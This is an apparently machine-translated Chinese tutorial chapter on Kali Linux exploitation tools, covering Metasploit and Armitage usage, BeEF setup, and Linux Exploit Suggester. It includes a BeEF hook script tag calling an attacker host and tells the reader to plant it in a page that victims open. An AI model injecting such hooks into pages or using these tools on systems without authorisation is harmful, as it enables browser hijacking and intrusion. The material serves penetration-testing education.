在本章中,我们将了解Kali Linux提供的各种开发工具.
如前所述,Metasploit是Rapid7的产品和大部分资源都可以在他们的网页上找到 www.metasploit.com .它有两个版本 - 商业版和免费版.这两个版本之间的差异并不大,在这种情况下,我们将使用社区版本(免费).
作为道德黑客,您将使用"Kali Ditribution"嵌入了Metasploit社区版本,以及其他道德黑客工具,通过节省安装时间非常舒适.但是,如果要作为单独的工具安装,则可以将其安装在Linux,Windows和OS X等操作系统中.
首先,在Kali中打开Metasploit控制台.然后,转到Applications → 开发工具 → Metasploit.
启动后,你会看到下面的屏幕,其中Metasploit的版本用红色加下划线.
在控制台中,如果您使用帮助或?符号,它将显示一个包含MSP命令及其描述的列表.您可以根据自己的需求和使用方式进行选择.
另一个重要的管理命令是 msfupdate ,它有助于使用最新的漏洞利用更新metasploit.在控制台中运行此命令后,您将需要等待几分钟,直到更新完成.
它有一个称为"搜索"的好命令,您可以使用它来查找所需内容,如以下屏幕截图所示.例如,我想找到与Microsoft相关的漏洞,命令可以是 msf>搜索名称:Microsoft类型:exploit .
其中"搜索"是命令,"name"是我们正在寻找的对象的名称,"type"是我们正在寻找的那种脚本.
另一个命令是"info".它提供有关使用它的模块或平台的信息,作者,漏洞参考以及可能具有的有效负载限制.
metasploit的Armitage GUI是metasploit的补充工具.它可视化目标,推荐漏洞,并公开高级的后期开发功能.
让我们打开它,但首先应该打开并启动metasploit控制台.要打开Armitage,请转到Applications → Exploit Tools → Armitage.
点击连接按钮,如下面的屏幕截图所示.
它会打开,你会看到以下屏幕.
阿米蒂奇是用户友好的. "目标"区域列出了您发现并正在使用的所有机器,被黑客攻击的目标是红色的,上面有雷暴.
攻击目标后,您可以右键单击它并继续探索您需要做的事情,例如浏览(浏览)文件夹.
在以下GUI中,您将看到文件夹的视图,称为控制台.只需单击文件夹,即可在不需要metasploit命令的情况下浏览文件夹.
在GUI的右侧,是列出漏洞模块的部分.
BeEF代表浏览器开发框架.它是一种专注于Web浏览器的渗透测试工具. BeEF允许专业渗透测试人员使用客户端攻击向量评估目标环境的实际安全状态.
首先,您必须使用以下命令更新Kali软件包 :
root @ kali:/#apt-get update root @ kali:/#apt-get install beef-xss
首先,使用以下命令 :
root @ kali:/#cd/usr/share/beef-xss root @ kali:/#./beef
打开浏览器并输入用户名和密码:牛肉.
BeEF钩子是托管在其上的JavaScript文件需要在客户端浏览器上运行的BeEF服务器.当它发生时,它会回调BeEF服务器,传达有关目标的大量信息.它还允许针对目标运行其他命令和模块.在此示例中, BeEF 挂钩的位置位于 http://192.168.1.101:3000/hook.js .
为了攻击浏览器,请在客户端将查看的页面中包含JavaScript钩子.有很多方法可以做到这一点,但最简单的方法是将以下内容插入页面,然后以某种方式让客户端打开它.
< script src ="http://192.168.1.101:3000/hook.js"type ="text/javascript"></script>
页面加载后,返回BeEF控制面板并单击左上角的"在线浏览器".几秒钟后,您应该会看到代表钩子浏览器的IP地址弹出窗口.将鼠标悬停在IP上会快速提供浏览器版本,操作系统以及安装的插件等信息.
要远程运行命令,请单击"拥有"主机.然后,在命令上单击要执行的模块,最后单击"执行".
它建议在Linux操作系统的发布版本'uname -r'的情况下获得可能的攻击.
要运行它,请键入以下命令 :
root @ kali:/usr/share/linux-exploit-suggester#./Linux_Exploit_Suggester.pl -k 3.0.0
3.0.0 是内核版本我们想要利用的Linux操作系统.
